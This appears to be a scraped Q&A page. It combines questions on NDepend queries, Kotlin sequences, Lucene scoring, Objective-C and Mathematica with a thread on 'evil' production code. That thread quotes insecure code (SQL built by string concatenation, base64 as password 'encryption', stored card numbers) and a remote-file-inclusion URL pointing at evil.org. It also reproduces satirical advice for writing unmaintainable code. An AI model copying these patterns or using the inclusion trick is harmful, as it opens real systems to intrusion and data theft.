NDepend Count, Average, etc.. reporting... aggregates. Possible? clean work arounds? - code-analysis

We have a huge code base, where methods with too many local variables alone returns 226 methods. I don't want this huge table being dumped into the xml output to clutter it up, and I'd like the top 10 if possible, but what I really want is the count so we can do trending and executive summaries. Is there a clean/efficient/scalable non-hacky way to do this?
I imagine I could use an executable task, instead of the ndepend task (so that the merge is not automatic) and the clutter doesn't get merged. Then manually operate on those files to get a summary, but I'd like to know if there is a shorter path?

What about defining a base line to only take account of new flaws?
what I really want is the count so we can do trending and executive summaries
Trending can be easily achieved with code queries and rules over LINQ (CQLinq) like: Avoid making complex methods even more complex (Source CC)
// <Name>Avoid making complex methods even more complex (Source CC)</Name>
// To visualize changes in code, right-click a matched method and select:
// - Compare older and newer versions of source file
// - Compare older and newer versions disassembled with Reflector
warnif count > 0
from m in JustMyCode.Methods where
!m.IsAbstract &&
m.IsPresentInBothBuilds() &&
m.CodeWasChanged()
let oldCC = m.OlderVersion().CyclomaticComplexity
where oldCC > 6 && m.CyclomaticComplexity > oldCC
select new { m,
oldCC ,
newCC = m.CyclomaticComplexity ,
oldLoc = m.OlderVersion().NbLinesOfCode,
newLoc = m.NbLinesOfCode,
}
or Avoid transforming an immutable type into a mutable one.

Related

Kotlin stdlib operatios vs for loops

I wrote the following code:
val src = (0 until 1000000).toList()
val dest = ArrayList<Double>(src.size / 2 + 1)
for (i in src)
{
if (i % 2 == 0) dest.add(Math.sqrt(i.toDouble()))
}
IntellJ (in my case AndroidStudio) is asking me if I want to replace the for loop with operations from stdlib. This results in the following code:
val src = (0 until 1000000).toList()
val dest = ArrayList<Double>(src.size / 2 + 1)
src.filter { it % 2 == 0 }
.mapTo(dest) { Math.sqrt(it.toDouble()) }
Now I must say, I like the changed code. I find it easier to write than for loops when I come up with similar situations. However upon reading what filter function does, I realized that this is a lot slower code compared to the for loop. filter function creates a new list containing only the elements from src that match the predicate. So there is one more list created and one more loop in the stdlib version of the code. Ofc for small lists it might not be important, but in general this does not sound like a good alternative. Especially if one should chain more methods like this, you can get a lot of additional loops that could be avoided by writing a for loop.
My question is what is considered good practice in Kotlin. Should I stick to for loops or am I missing something and it does not work as I think it works.
If you are concerned about performance, what you need is Sequence. For example, your above code will be
val src = (0 until 1000000).toList()
val dest = ArrayList<Double>(src.size / 2 + 1)
src.asSequence()
.filter { it % 2 == 0 }
.mapTo(dest) { Math.sqrt(it.toDouble()) }
In the above code, filter returns another Sequence, which represents an intermediate step. Nothing is really created yet, no object or array creation (except a new Sequence wrapper). Only when mapTo, a terminal operator, is called does the resulting collection is created.
If you have learned java 8 stream, you may found the above explaination somewhat familiar. Actually, Sequence is roughly the kotlin equivalent of java 8 Stream. They share similiar purpose and performance characteristic. The only difference is Sequence isn't designed to work with ForkJoinPool, thus a lot easier to implement.
When there is multiple steps involved or the collection may be large, it's suggested to use Sequence instead of plain .filter {...}.mapTo{...}. I also suggest you to use the Sequence form instead of your imperative form because it's easier to understand. Imperative form may become complex, thus hard to understand, when there are 5 or more steps involved in the data processing. If there is just one step, you don't need a Sequence, because it just creates garbage and gives you nothing useful.
You're missing something. :-)
In this particular case, you can use an IntProgression:
val progression = 0 until 1_000_000 step 2
You can then create your desired list of squares in various ways:
// may make the list larger than necessary
// its internal array is copied each time the list grows beyond its capacity
// code is very straight forward
progression.map { Math.sqrt(it.toDouble()) }
// will make the list the exact size needed
// no copies are made
// code is more complicated
progression.mapTo(ArrayList(progression.last / 2 + 1)) { Math.sqrt(it.toDouble()) }
// will make the list the exact size needed
// a single intermediate list is made
// code is minimal and makes sense
progression.toList().map { Math.sqrt(it.toDouble()) }
My advice would be to choose whichever coding style you prefer. Kotlin is both object-oriented and functional language, meaning both of your propositions are correct.
Usually, functional constructs favor readability over performance; however, in some cases, procedural code will also be more readable. You should try to stick with one style as much as possible, but don't be afraid to switch some code if you feel like it's better suited to your constraints, either readability, performance, or both.
The converted code does not need the manual creation of the destination list, and can be simplified to:
val src = (0 until 1000000).toList()
val dest = src.filter { it % 2 == 0 }
.map { Math.sqrt(it.toDouble()) }
And as mentioned in the excellent answer by #glee8e you can use a sequence to do a lazy evaluation. The simplified code for using a sequence:
val src = (0 until 1000000).toList()
val dest = src.asSequence() // change to lazy
.filter { it % 2 == 0 }
.map { Math.sqrt(it.toDouble()) }
.toList() // create the final list
Note the addition of the toList() at the end is to change from a sequence back to a final list which is the one copy made during the processing. You can omit that step to remain as a sequence.
It is important to highlight the comments by #hotkey saying that you should not always assume that another iteration or a copy of a list causes worse performance than lazy evaluation. #hotkey says:
Sometimes several loops. even if they copy the whole collection, show good performance because of good locality of reference. See: Kotlin's Iterable and Sequence look exactly same. Why are two types required?
And excerpted from that link:
... in most cases it has good locality of reference thus taking advantage of CPU cache, prediction, prefetching etc. so that even multiple copying of a collection still works good enough and performs better in simple cases with small collections.
#glee8e says that there are similarities between Kotlin sequences and Java 8 streams, for detailed comparisons see: What Java 8 Stream.collect equivalents are available in the standard Kotlin library?

Getting Term Frequencies For Query

In Lucene, a query can be composed of many sub-queries. (such as TermQuery objects)
I'd like a way to iterate over the documents returned by a search, and for each document, to then iterate over the sub-queries.
For each sub-query, I'd like to get the number of times it matched. (I'm also interested in the fieldNorm, etc.)
I can get access to that data by using indexSearcher.explain, but that feels quite hacky because I would then need to parse the "description" member of each nested Explanation object to try and find the term frequency, etc. (also, calling "explain" is very slow, so I'm hoping for a faster approach)
The context here is that I'd like to experiment with re-ranking Lucene's top N search results, and to do that it's obviously helpful to extract as many "features" as possible about the matches.
Via looking at the source code for classes like TermQuery, the following appears to be a basic approach:
// For each document... (scoreDoc.doc is an integer)
Weight weight = weightCache.get(query);
if (weight == null)
{
weight = query.createWeight(indexSearcher, true);
weightCache.put(query, weight);
}
IndexReaderContext context = indexReader.getContext();
List<LeafReaderContext> leafContexts = context.leaves();
int n = ReaderUtil.subIndex(scoreDoc.doc, leafContexts);
LeafReaderContext leafReaderContext = leafContexts.get(n);
Scorer scorer = weight.scorer(leafReaderContext);
int deBasedDoc = scoreDoc.doc - leafReaderContext.docBase;
int thisDoc = scorer.iterator().advance(deBasedDoc);
float freq = 0;
if (thisDoc == deBasedDoc)
{
freq = scorer.freq();
}
The 'weightCache' is of type Map and is useful so that you don't have to re-create the Weight object for every document you process. (otherwise, the code runs about 10x slower)
Is this approximately what I should be doing? Are there any obvious ways to make this run faster? (it takes approx 2 ms for 280 documents, as compared to about 1 ms to perform the query itself)
Another challenge with this approach is that it requires code to navigate through your Query object to try and find the sub-queries. For example, if it's a BooleanQuery, you call query.clauses() and recurse on them to look for all leaf TermQuery objects, etc. Not sure if there is a more elegant / less brittle way to do that.

Nested arrays of methods/data

I have a question regarding nested arrays of objects.
I’m writing a simple objective c program (I’m a beginner) and I was wondering whether it is advisable to structure an array in such a way that not only are all the individual batting scores be logged (data), but also methods embedded in the nested arrays could be used to interrogate the this data.
For example the line below is easily readable (even for those who are not cricket fans!)
Team1.Over[2].BowlNumber[3].score = 6
Team 1 scored a 6 during the 3rd bowl in the 2nd Over.
I would also like to do something like the following where I can use a method to interrogate the data. The method line below would just cycle through the scores within BowNumber[] and total the scores up
Total =  Over[2].TotalForAmountForOver()
I could set up and manage all the arrays from within main() , but its much easier to read if I can embed as much as possible within the structure. 
Is this a common approach?
 
Haven't seen many examples of fairly complicated embedded arrays of data and methods…. 
You'd easily be able to achieve this by making Over cant Bowl classes that each wrap an NSMutableArray object. e.g.
- (void)getOverNumer:(int)index {
return [overs objectAtIndex:index];
}
You'd then access it like this:
[[team1 getOverNumber:2] getBowlNumber:2].score = 6;
int total = [[team1 getOverNumber:2] totalForAmountForOver];
You'd implement totalForAmountForOver as a method within your Over class.

Clearing numerical values in Mathematica

I am working on fairly large Mathematica projects and the problem arises that I have to intermittently check numerical results but want to easily revert to having all my constructs in analytical form.
The code is fairly fluid I don't want to use scoping constructs everywhere as they add work overhead. Is there an easy way for identifying and clearing all assignments that are numerical?
EDIT: I really do know that scoping is the way to do this correctly ;-). However, for my workflow I am really just looking for a dirty trick to nix all numerical assignments after the fact instead of having the foresight to put down a Block.
If your assignments are on the top level, you can use something like this:
a = 1;
b = c;
d = 3;
e = d + b;
Cases[DownValues[In],
HoldPattern[lhs_ = rhs_?NumericQ] |
HoldPattern[(lhs_ = rhs_?NumericQ;)] :> Unset[lhs],
3]
This will work if you have a sufficient history length $HistoryLength (defaults to infinity). Note however that, in the above example, e was assigned 3+c, and 3 here was not undone. So, the problem is really ambiguous in formulation, because some numbers could make it into definitions. One way to avoid this is to use SetDelayed for assignments, rather than Set.
Another alternative would be to analyze the names in say Global' context (if that is the context where your symbols live), and then say OwnValues and DownValues of the symbols, in a fashion similar to the above, and remove definitions with purely numerical r.h.s.
But IMO neither of these approaches are robust. I'd still use scoping constructs and try to isolate numerics. One possibility is to wrap you final code in Block, and assign numerical values inside this Block. This seems a much cleaner approach. The work overhead is minimal - you just have to remember which symbols you want to assign the values to. Block will automatically ensure that outside it, the symbols will have no definitions.
EDIT
Yet another possibility is to use local rules. For example, one could define rule[a] = a->1; rule[d]=d->3 instead of the assignments above. You could then apply these rules, extracting them as say
DownValues[rule][[All, 2]], whenever you want to test with some numerical arguments.
Building on Andrew Moylan's solution, one can construct a Block like function that would takes rules:
SetAttributes[BlockRules, HoldRest]
BlockRules[rules_, expr_] :=
Block ## Append[Apply[Set, Hold#rules, {2}], Unevaluated[expr]]
You can then save your numeric rules in a variable, and use BlockRules[ savedrules, code ], or even define a function that would apply a fixed set of rules, kind of like so:
In[76]:= NumericCheck =
Function[body, BlockRules[{a -> 3, b -> 2`}, body], HoldAll];
In[78]:= a + b // NumericCheck
Out[78]= 5.
EDIT In response to Timo's comment, it might be possible to use NotebookEvaluate (new in 8) to achieve the requested effect.
SetAttributes[BlockRules, HoldRest]
BlockRules[rules_, expr_] :=
Block ## Append[Apply[Set, Hold#rules, {2}], Unevaluated[expr]]
nb = CreateDocument[{ExpressionCell[
Defer[Plot[Sin[a x], {x, 0, 2 Pi}]], "Input"],
ExpressionCell[Defer[Integrate[Sin[a x^2], {x, 0, 2 Pi}]],
"Input"]}];
BlockRules[{a -> 4}, NotebookEvaluate[nb, InsertResults -> "True"];]
As the result of this evaluation you get a notebook with your commands evaluated when a was locally set to 4. In order to take it further, you would have to take the notebook
with your code, open a new notebook, evaluate Notebooks[] to identify the notebook of interest and then do :
BlockRules[variablerules,
NotebookEvaluate[NotebookPut[NotebookGet[nbobj]],
InsertResults -> "True"]]
I hope you can make this idea work.

What is the most EVIL code you have ever seen in a production enterprise environment? [closed]

As it currently stands, this question is not a good fit for our Q&A format. We expect answers to be supported by facts, references, or expertise, but this question will likely solicit debate, arguments, polling, or extended discussion. If you feel that this question can be improved and possibly reopened, visit the help center for guidance.
Closed 11 years ago.
Locked. This question and its answers are locked because the question is off-topic but has historical significance. It is not currently accepting new answers or interactions.
What is the most evil or dangerous code fragment you have ever seen in a production environment at a company? I've never encountered production code that I would consider to be deliberately malicious and evil, so I'm quite curious to see what others have found.
The most dangerous code I have ever seen was a stored procedure two linked-servers away from our core production database server. The stored procedure accepted any NVARCHAR(8000) parameter and executed the parameter on the target production server via an double-jump sp_executeSQL command. That is to say, the sp_executeSQL command executed another sp_executeSQL command in order to jump two linked servers. Oh, and the linked server account had sysadmin rights on the target production server.
Warning: Long scary post ahead
I've written about one application I've worked on before here and here. To put it simply, my company inherited 130,000 lines of garbage from India. The application was written in C#; it was a teller app, the same kind of software tellers use behind the counter whenever you go to the bank. The app crashed 40-50 times a day, and it simply couldn't be refactored into working code. My company had to re-write the entire app over the course of 12 months.
Why is this application evil? Because the sight of the source code was enough to drive a sane man mad and a mad man sane. The twisted logic used to write this application could have only been inspired by a Lovecraftian nightmare. Unique features of this application included:
Out of 130,000 lines of code, the entire application contained 5 classes (excluding form files). All of these were public static classes. One class was called Globals.cs, which contained 1000s and 1000s and 1000s of public static variables used to hold the entire state of the application. Those five classes contained 20,000 lines of code total, with the remaining code embedded in the forms.
You have to wonder, how did the programmers manage to write such a big application without any classes? What did they use to represent their data objects? It turns out the programmers managed to re-invent half of the concepts we all learned about OOP simply by combining ArrayLists, HashTables, and DataTables. We saw a lot of this:
ArrayLists of hashtables
Hashtables with string keys and DataRow values
ArrayLists of DataTables
DataRows containing ArrayLists which contained HashTables
ArrayLists of DataRows
ArrayLists of ArrayLists
HashTables with string keys and HashTable values
ArrayLists of ArrayLists of HashTables
Every other combination of ArrayLists, HashTables, DataTables you can think of.
Keep in mind, none of the data structures above are strongly typed, so you have to cast whatever mystery object you get out of the list to the correct type. It's amazing what kind of complex, Rube Goldberg-like data structures you can create using just ArrayLists, HashTables, and DataTables.
To share an example of how to use the object model detailed above, consider Accounts: the original programmer created a seperate HashTable for each concievable property of an account: a HashTable called hstAcctExists, hstAcctNeedsOverride, hstAcctFirstName. The keys for all of those hashtables was a “|” separated string. Conceivable keys included “123456|DDA”, “24100|SVG”, “100|LNS”, etc.
Since the state of the entire application was readily accessible from global variables, the programmers found it unnecessary to pass parameters to methods. I'd say 90% of methods took 0 parameters. Of the few which did, all parameters were passed as strings for convenience, regardless of what the string represented.
Side-effect free functions did not exist. Every method modified 1 or more variables in the Globals class. Not all side-effects made sense; for example, one of the form validation methods had a mysterious side effect of calculating over and short payments on loans for whatever account was stored Globals.lngAcctNum.
Although there were lots of forms, there was one form to rule them all: frmMain.cs, which contained a whopping 20,000 lines of code. What did frmMain do? Everything. It looked up accounts, printed receipts, dispensed cash, it did everything.
Sometimes other forms needed to call methods on frmMain. Rather than factor that code out of the form into a seperate class, why not just invoke the code directly:
((frmMain)this.MDIParent).UpdateStatusBar(hstValues);
To look up accounts, the programmers did something like this:
bool blnAccountExists =
new frmAccounts().GetAccountInfo().blnAccountExists
As bad as it already is creating an invisible form to perform business logic, how do you think the form knew which account to look up? That’s easy: the form could access Globals.lngAcctNum and Globals.strAcctType. (Who doesn't love Hungarian notation?)
Code-reuse was a synonym for ctrl-c, ctrl-v. I found 200-line methods copy/pasted across 20 forms.
The application had a bizarre threading model, something I like to call the thread-and-timer model: each form that spawned a thread had a timer on it. Each thread that was spawned kicked off a timer which had a 200 ms delay; once the timer started, it would check to see if the thread had set some magic boolean, then it would abort the thread. The resulting ThreadAbortException was swallowed.
You'd think you'd only see this pattern once, but I found it in at least 10 different places.
Speaking of threads, the keyword "lock" never appeared in the application. Threads manipulated global state freely without taking a lock.
Every method in the application contained a try/catch block. Every exception was logged and swallowed.
Who needs to switch on enums when switching on strings is just as easy!
Some genius figured out that you can hook multiple form controls up to the same event handler. How did the programmer handle this?
private void OperationButton_Click(object sender, EventArgs e)
{
Button btn = (Button)sender;
if (blnModeIsAddMc)
{
AddMcOperationKeyPress(btn);
}
else
{
string strToBeAppendedLater = string.Empty;
if (btn.Name != "btnBS")
{
UpdateText();
}
if (txtEdit.Text.Trim() != "Error")
{
SaveFormState();
}
switch (btn.Name)
{
case "btnC":
ResetValues();
break;
case "btnCE":
txtEdit.Text = "0";
break;
case "btnBS":
if (!blnStartedNew)
{
string EditText = txtEdit.Text.Substring(0, txtEdit.Text.Length - 1);
DisplayValue((EditText == string.Empty) ? "0" : EditText);
}
break;
case "btnPercent":
blnAfterOp = true;
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, false);
decCurrValue = decResultValue * decCurrValue / intFormatFactor;
DisplayValue(GetValueString(decCurrValue));
AddToTape(GetValueString(decCurrValue), string.Empty, true, false);
strToBeAppendedLater = GetValueString(decResultValue).PadLeft(20)
+ strOpPressed.PadRight(3);
if (arrLstTapeHist.Count == 0)
{
arrLstTapeHist.Add(strToBeAppendedLater);
}
blnEqualOccurred = false;
blnStartedNew = true;
}
break;
case "btnAdd":
case "btnSubtract":
case "btnMultiply":
case "btnDivide":
blnAfterOp = true;
if (txtEdit.Text.Trim() == "Error")
{
btnC.PerformClick();
return;
}
if (blnNumPressed || blnEqualOccurred)
{
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
if (Operation())
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, true);
DisplayValue(GetValueString(decResultValue));
}
else
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, true);
DisplayValue("Error");
}
strOpPressed = btn.Text;
blnEqualOccurred = false;
blnNumPressed = false;
}
}
else
{
strOpPressed = btn.Text;
AddToTape(GetValueString(0), (string)btn.Text, false, false);
}
if (txtEdit.Text.Trim() == "Error")
{
AddToTape("Error", string.Empty, true, true);
btnC.PerformClick();
txtEdit.Text = "Error";
}
break;
case "btnEqual":
blnAfterOp = false;
if (strOpPressed != string.Empty || strPrevOp != string.Empty)
{
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
if (OperationEqual())
{
DisplayValue(GetValueString(decResultValue));
}
else
{
DisplayValue("Error");
}
if (!blnEqualOccurred)
{
strPrevOp = strOpPressed;
decHistValue = decCurrValue;
blnNumPressed = false;
blnEqualOccurred = true;
}
strOpPressed = string.Empty;
}
}
break;
case "btnSign":
GetValueDecimal(txtEdit.Text, out decCurrValue);
DisplayValue(GetValueString(-1 * decCurrValue));
break;
}
}
}
The same genius also discovered the glorious ternary operator. Here are some code samples:
frmTranHist.cs [line 812]:
strDrCr = chkCredits.Checked && chkDebits.Checked ? string.Empty
: chkDebits.Checked ? "D"
: chkCredits.Checked ? "C"
: "N";
frmTellTransHist.cs [line 961]:
if (strDefaultVals == strNowVals && (dsTranHist == null ? true : dsTranHist.Tables.Count == 0 ? true : dsTranHist.Tables[0].Rows.Count == 0 ? true : false))
frmMain.TellCash.cs [line 727]:
if (Validations(parPostMode == "ADD" ? true : false))
Here's a code snippet which demonstrates the typical misuse of the StringBuilder. Note how the programmer concats a string in a loop, then appends the resulting string to the StringBuilder:
private string CreateGridString()
{
string strTemp = string.Empty;
StringBuilder strBuild = new StringBuilder();
foreach (DataGridViewRow dgrRow in dgvAcctHist.Rows)
{
strTemp = ((DataRowView)dgrRow.DataBoundItem)["Hst_chknum"].ToString().PadLeft(8, ' ');
strTemp += " ";
strTemp += Convert.ToDateTime(((DataRowView)dgrRow.DataBoundItem)["Hst_trandt"]).ToString("MM/dd/yyyy");
strTemp += " ";
strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_DrAmount"].ToString().PadLeft(15, ' ');
strTemp += " ";
strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_CrAmount"].ToString().PadLeft(15, ' ');
strTemp += " ";
strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_trancd"].ToString().PadLeft(4, ' ');
strTemp += " ";
strTemp += GetDescriptionString(((DataRowView)dgrRow.DataBoundItem)["Hst_desc"].ToString(), 30, 62);
strBuild.AppendLine(strTemp);
}
strCreateGridString = strBuild.ToString();
return strCreateGridString;//strBuild.ToString();
}
No primary keys, indexes, or foreign key constraints existed on tables, nearly all fields were of type varchar(50), and 100% of fields were nullable. Interestingly, bit fields were not used to store boolean data; instead a char(1) field was used, and the characters 'Y' and 'N' used to represent true and false respectively.
Speaking of the database, here's a representative example of a stored procedure:
ALTER PROCEDURE [dbo].[Get_TransHist]
(
#TellerID int = null,
#CashDrawer int = null,
#AcctNum bigint = null,
#StartDate datetime = null,
#EndDate datetime = null,
#StartTranAmt decimal(18,2) = null,
#EndTranAmt decimal(18,2) = null,
#TranCode int = null,
#TranType int = null
)
AS
declare #WhereCond Varchar(1000)
declare #strQuery Varchar(2000)
Set #WhereCond = ' '
Set #strQuery = ' '
If not #TellerID is null
Set #WhereCond = #WhereCond + ' AND TT.TellerID = ' + Cast(#TellerID as varchar)
If not #CashDrawer is null
Set #WhereCond = #WhereCond + ' AND TT.CDId = ' + Cast(#CashDrawer as varchar)
If not #AcctNum is null
Set #WhereCond = #WhereCond + ' AND TT.AcctNbr = ' + Cast(#AcctNum as varchar)
If not #StartDate is null
Set #WhereCond = #WhereCond + ' AND Convert(varchar,TT.PostDate,121) >= ''' + Convert(varchar,#StartDate,121) + ''''
If not #EndDate is null
Set #WhereCond = #WhereCond + ' AND Convert(varchar,TT.PostDate,121) <= ''' + Convert(varchar,#EndDate,121) + ''''
If not #TranCode is null
Set #WhereCond = #WhereCond + ' AND TT.TranCode = ' + Cast(#TranCode as varchar)
If not #EndTranAmt is null
Set #WhereCond = #WhereCond + ' AND TT.TranAmt <= ' + Cast(#EndTranAmt as varchar)
If not #StartTranAmt is null
Set #WhereCond = #WhereCond + ' AND TT.TranAmt >= ' + Cast(#StartTranAmt as varchar)
If not (#TranType is null or #TranType = -1)
Set #WhereCond = #WhereCond + ' AND TT.DocType = ' + Cast(#TranType as varchar)
--Get the Teller Transaction Records according to the filters
Set #strQuery = 'SELECT
TT.TranAmt as [Transaction Amount],
TT.TranCode as [Transaction Code],
RTrim(LTrim(TT.TranDesc)) as [Transaction Description],
TT.AcctNbr as [Account Number],
TT.TranID as [Transaction Number],
Convert(varchar,TT.ActivityDateTime,101) as [Activity Date],
Convert(varchar,TT.EffDate,101) as [Effective Date],
Convert(varchar,TT.PostDate,101) as [Post Date],
Convert(varchar,TT.ActivityDateTime,108) as [Time],
TT.BatchID,
TT.ItemID,
isnull(TT.DocumentID, 0) as DocumentID,
TT.TellerName,
TT.CDId,
TT.ChkNbr,
RTrim(LTrim(DT.DocTypeDescr)) as DocTypeDescr,
(CASE WHEN TT.TranMode = ''F'' THEN ''Offline'' ELSE ''Online'' END) TranMode,
DispensedYN
FROM TellerTrans TT WITH (NOLOCK)
LEFT OUTER JOIN DocumentTypes DT WITH (NOLOCK) on DocType = DocumentType
WHERE IsNull(TT.DeletedYN, 0) = 0 ' + #WhereCond + ' Order By BatchId, TranID, ItemID'
Exec (#strQuery)
With all that said, the single biggest problem with this 130,000 line application this: no unit tests.
Yes, I have sent this story to TheDailyWTF, and then I quit my job.
In a system which took credit card payments we used to store the full credit card number along with name, expiration date etc.
Turns out this is illegal, which is ironic given the we were writing the program for the Justice Department at the time.
I've seen a password encryption function like this
function EncryptPassword($password)
{
return base64_encode($password);
}
This was the error handling routine in a piece of commercial code:
/* FIXME! */
while (TRUE)
;
I was supposed to find out why "the app keeps locking up".
Combination of all of the following Php 'Features' at once.
Register Globals
Variable Variables
Inclusion of remote files and code via include("http:// ... ");
Really Horrific Array/Variable names ( Literal example ):
foreach( $variablesarry as $variablearry ){
include( $$variablearry );
}
( I literally spent an hour trying to work out how that worked before I realised they wern't the same variable )
Include 50 files, which each include 50 files, and stuff is performed linearly/procedurally across all 50 files in conditional and unpredictable ways.
For those who don't know variable variables:
$x = "hello";
$$x = "world";
print $hello # "world" ;
Now consider $x contains a value from your URL ( register globals magic ), so nowhere in your code is it obvious what variable your working with becuase its all determined by the url.
Now consider what happens when the contents of that variable can be a url specified by the websites user.
Yes, this may not make sense to you, but it creates a variable named that url, ie:
$http://google.com,
except it cant be directly accessed, you have to use it via the double $ technique above.
Additionally, when its possible for a user to specify a variable on the URL which indicates which file to include, there are nasty tricks like
http://foo.bar.com/baz.php?include=http://evil.org/evilcode.php
and if that variable turns up in include($include)
and 'evilcode.php' prints its code plaintext, and Php is inappropriately secured, php will just trundle off, download evilcode.php, and execute it as the user of the web-server.
The web-sever will give it all its permissions etc, permiting shell calls, downloading arbitrary binaries and running them, etc etc, until eventually you wonder why you have a box running out of disk space, and one dir has 8GB of pirated movies with italian dubbing, being shared on IRC via a bot.
I'm just thankful I discovered that atrocity before the script running the attack decided to do something really dangerous like harvest extremely confidential information from the more or less unsecured database :|
( I could entertain the dailywtf every day for 6 months with that codebase, I kid you not. Its just a shame I discovered the dailywtf after I escaped that code )
In the main project header file, from an old-hand COBOL programmer, who was inexplicably writing a compiler in C:
int i, j, k;
"So you won't get a compiler error if you forget to declare your loop variables."
The Windows installer.
This article How to Write Unmaintainable Code covers some of the most brilliant techniques known to man. Some of my favorite ones are:
New Uses For Names For Baby
Buy a copy of a baby naming book and you'll never be at a loss for variable names. Fred is a wonderful name, and easy to type. If you're looking for easy-to-type variable names, try adsf or aoeu if you type with a DSK keyboard.
Creative Miss-spelling
If you must use descriptive variable and function names, misspell them. By misspelling in some function and variable names, and spelling it correctly in others (such as SetPintleOpening SetPintalClosing) we effectively negate the use of grep or IDE search techniques. It works amazingly well. Add an international flavor by spelling tory or tori in different theatres/theaters.
Be Abstract
In naming functions and variables, make heavy use of abstract words like it, everything, data, handle, stuff, do, routine, perform and the digits e.g. routineX48, PerformDataFunction, DoIt, HandleStuff and do_args_method.
CapiTaliSaTion
Randomly capitalize the first letter of a syllable in the middle of a word. For example ComputeRasterHistoGram().
Lower Case l Looks a Lot Like the Digit 1
Use lower case l to indicate long constants. e.g. 10l is more likely to be mistaken for 101 that 10L is. Ban any fonts that clearly disambiguate uvw wW gq9 2z 5s il17|!j oO08 `'" ;,. m nn rn {[()]}. Be creative.
Recycle Your Variables
Wherever scope rules permit, reuse existing unrelated variable names. Similarly, use the same temporary variable for two unrelated purposes (purporting to save stack slots). For a fiendish variant, morph the variable, for example, assign a value to a variable at the top of a very long method, and then somewhere in the middle, change the meaning of the variable in a subtle way, such as converting it from a 0-based coordinate to a 1-based coordinate. Be certain not to document this change in meaning.
Cd wrttn wtht vwls s mch trsr
When using abbreviations inside variable or method names, break the boredom with several variants for the same word, and even spell it out longhand once in while. This helps defeat those lazy bums who use text search to understand only some aspect of your program. Consider variant spellings as a variant on the ploy, e.g. mixing International colour, with American color and dude-speak kulerz. If you spell out names in full, there is only one possible way to spell each name. These are too easy for the maintenance programmer to remember. Because there are so many different ways to abbreviate a word, with abbreviations, you can have several different variables that all have the same apparent purpose. As an added bonus, the maintenance programmer might not even notice they are separate variables.
Obscure film references
Use constant names like LancelotsFavouriteColour instead of blue and assign it hex value of $0204FB. The color looks identical to pure blue on the screen, and a maintenance programmer would have to work out 0204FB (or use some graphic tool) to know what it looks like. Only someone intimately familiar with Monty Python and the Holy Grail would know that Lancelot's favorite color was blue. If a maintenance programmer can't quote entire Monty Python movies from memory, he or she has no business being a programmer.
Document the obvious
Pepper the code with comments like /* add 1 to i */ however, never document wooly stuff like the overall purpose of the package or method.
Document How Not Why
Document only the details of what a program does, not what it is attempting to accomplish. That way, if there is a bug, the fixer will have no clue what the code should be doing.
Side Effects
In C, functions are supposed to be idempotent, (without side effects). I hope that hint is sufficient.
Use Octal
Smuggle octal literals into a list of decimal numbers like this:
array = new int []
{
111,
120,
013,
121,
};
Extended ASCII
Extended ASCII characters are perfectly valid as variable names, including ß, Ð, and ñ characters. They are almost impossible to type without copying/pasting in a simple text editor.
Names From Other Languages
Use foreign language dictionaries as a source for variable names. For example, use the German punkt for point. Maintenance coders, without your firm grasp of German, will enjoy the multicultural experience of deciphering the meaning.
Names From Mathematics
Choose variable names that masquerade as mathematical operators, e.g.:
openParen = (slash + asterix) / equals;
Code That Masquerades As Comments and Vice Versa
Include sections of code that is commented out but at first glance does not appear to be.
for(j=0; j<array_len; j+ =8)
{
total += array[j+0 ];
total += array[j+1 ];
total += array[j+2 ]; /* Main body of
total += array[j+3]; * loop is unrolled
total += array[j+4]; * for greater speed.
total += array[j+5]; */
total += array[j+6 ];
total += array[j+7 ];
}
Without the colour coding would you notice that three lines of code are commented out?
Arbitrary Names That Masquerade as Keywords
When documenting, and you need an arbitrary name to represent a filename use "file ". Never use an obviously arbitrary name like "Charlie.dat" or "Frodo.txt". In general, in your examples, use arbitrary names that sound as much like reserved keywords as possible. For example, good names for parameters or variables would be"bank", "blank", "class", "const ", "constant", "input", "key", "keyword", "kind", "output", "parameter" "parm", "system", "type", "value", "var" and "variable ". If you use actual reserved words for your arbitrary names, which would be rejected by your command processor or compiler, so much the better. If you do this well, the users will be hopelessly confused between reserved keywords and arbitrary names in your example, but you can look innocent, claiming you did it to help them associate the appropriate purpose with each variable.
Code Names Must Not Match Screen Names
Choose your variable names to have absolutely no relation to the labels used when such variables are displayed on the screen. E.g. on the screen label the field "Postal Code" but in the code call the associated variable "zip".
Choosing The Best Overload Operator
In C++, overload +,-,*,/ to do things totally unrelated to addition, subtraction etc. After all, if the Stroustroup can use the shift operator to do I/O, why should you not be equally creative? If you overload +, make sure you do it in a way that i = i + 5; has a totally different meaning from i += 5; Here is an example of elevating overloading operator obfuscation to a high art. Overload the '!' operator for a class, but have the overload have nothing to do with inverting or negating. Make it return an integer. Then, in order to get a logical value for it, you must use '! !'. However, this inverts the logic, so [drum roll] you must use '! ! !'. Don't confuse the ! operator, which returns a boolean 0 or 1, with the ~ bitwise logical negation operator.
Exceptions
I am going to let you in on a little-known coding secret. Exceptions are a pain in the behind. Properly-written code never fails, so exceptions are actually unnecessary. Don't waste time on them. Subclassing exceptions is for incompetents who know their code will fail. You can greatly simplify your program by having only a single try/catch in the entire application (in main) that calls System.exit(). Just stick a perfectly standard set of throws on every method header whether they could actually throw any exceptions or not.
Magic Matrix Locations
Use special values in certain matrix locations as flags. A good choice is the [3][0] element in a transformation matrix used with a homogeneous coordinate system.
Magic Array Slots revisited
If you need several variables of a given type, just define an array of them, then access them by number. Pick a numbering convention that only you know and don't document it. And don't bother to define #define constants for the indexes. Everybody should just know that the global variable widget[15] is the cancel button. This is just an up-to-date variant on using absolute numerical addresses in assembler code.
Never Beautify
